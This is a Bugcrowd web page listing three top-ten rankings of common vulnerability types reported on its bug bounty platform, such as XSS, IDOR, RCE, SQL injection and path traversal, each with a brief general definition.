Request a Demo Contact Us
Bugcrowd Achieves Global CREST Accreditation For Pen Testing
Learn More
Updated January 2025

Top 10 Vulnerabilities

Bugcrowd tracks the global vulnerability landscape based on the hundreds of thousands of vulnerability reports our platform processes annually—providing critical data for customers and hackers in reports, benchmarks, and recommendations.

For more insight about the vulnerability rankings below, see our annual Inside the Platform: Bugcrowd Vulnerability Trends report.

1.

Reflected cross-site scripting (XSS)

XSS refers to an attacker’s ability to inject malicious code into a website’s context, with the code executing if an unsuspecting user clicks on it.
2.

Disclosure of secrets

This can occur when a website or app doesn’t properly protect deployment secrets, tokens, PII, IP, and other sensitive info.
3.

Insecure direct object reference (IDOR)

IDOR is present when an application allows an unauthorized user to reference an object to which they shouldn't have access.
4.

Lack of security headers

This refers to the absence of security headers, such as for HSTS, Cache-Control, and Content-Security Policy, exposing web apps to various risks.
5.

Failure to invalidate session

If the application fails to invalidate a session after a password is changed, it enables an attacker to continue using the compromised session.
6.

Stored XSS

This arises when an application receives data from an untrusted source, and injects client-side scripts within the context of a user's browser session.
7.

Content spoofing

When an app doesn’t handle user-supplied data safely, an attacker can supply their own content (typically via a parameter value) back to the user for nefarious purposes.
8.

Open redirect

This enables an attacker to manipulate user input for the purpose of redirecting them to malicious websites
9.

Directory listing enabled

Web servers that have directory listing enabled can allow attackers to easily identify the resources in a given path. for reconnaissance purposes.
10.

Misconfigured DNS

This is present when a DNS is set up incorrectly in a way that could create the risk of an unauthorized takeover of DNS-specific technologies such as email, website hosting, and more.
1.

Disclosure of secrets

This can occur when a website or application doesn’t properly protect deployment secrets, tokens, PII, IP, and other sensitive info.
2.

Authentication bypass

This vuln is present when an attacker can circumvent website authentication in order to access restricted resources or gain unauthorized control.
3.

Insecure direct object reference (IDOR)

IDOR is present when an application allows an unauthorized user to reference an object to which they shouldn't have access.
4.

Remote code execution (RCE)

With RCE, an attacker can run arbitrary code on a target system remotely due to unvalidated user inputs, insecure APIs, misconfigurations, or other flaws.
5.

SQL injection

This refers to when an attacker inserts malicious code into a SQL query in order to access, modify, or delete data, bypass authentication, or execute admin commands.
6.

OAuth misconfiguration

An application that improperly implements or configures the OAuth authentication and authorization framework can create security vulnerabilities, such as exposure of OAuth tokens.
7.

Stored XSS

This arises when an application receives data from an untrusted source, and injects client-side scripts within the context of a user's browser session.
8.

File inclusion

A file inclusion flaw is present if an app allows an attacker to include files on the server through user input, typically by manipulating file paths in URLs or form fields.
9.

DNS with critical impact

This vuln refers to the risk of a DNS disruption leading to lost revenue and/or severe reputational damage due to loss of application accessibility.
10.

Misconfigured DNS

This is present when a DNS is set up incorrectly in a way that could create the risk of an unauthorized takeover of DNS-specific technologies such as email, website hosting, and more.
1.

Sensitive data—hardcoded

This refers to the practice of embedding sensitive information, such as passwords, encryption keys, or API keys, directly inn application source code where attackers can easily find it.
2.

Remote code execution (RCE)

With RCE, an attacker can run arbitrary code on a target system remotely due to unvalidated user inputs, insecure APIs, misconfigurations, or other flaws.
3.

Second factor authentication

A second-factor authentication (2FA) flaw, such as the ability to bypass 2FA or insecurely stored 2FA-related data, can create a significant risk.
4.

Content spoofing

When an app doesn’t handle user-supplied data safely, an attacker can supply (“spoof”) their own content (typically via a parameter value) back to the user for nefarious purposes.
5.

Authentication bypass

This vuln is present when an attacker can circumvent website authentication in order to access restricted resources or gain unauthorized control.
6.

SQL injection

This refers to when an attacker inserts malicious code into a SQL query in order to access, modify, or delete data, bypass authentication, or execute admin commands.
7.

Command injection

Command injection occurs when an attacker injects and executes arbitrary commands by exploiting an insecure system that passes user input to a command-line interface or shell.
8.

Disclosure of secrets

This arises when a website or application doesn’t properly protect deployment secrets, tokens, PII, IP, and other sensitive info.
9.

XML external entity injection (XXE)

XXE refers to the ability of an attacker to manipulate XML input and exploit the app’s XML parser to access resources on the server.
10.

Path traversal

This flaw allows an attacker to access files and directories outside the intended scope of an application—potentially accessing sensitive files or data.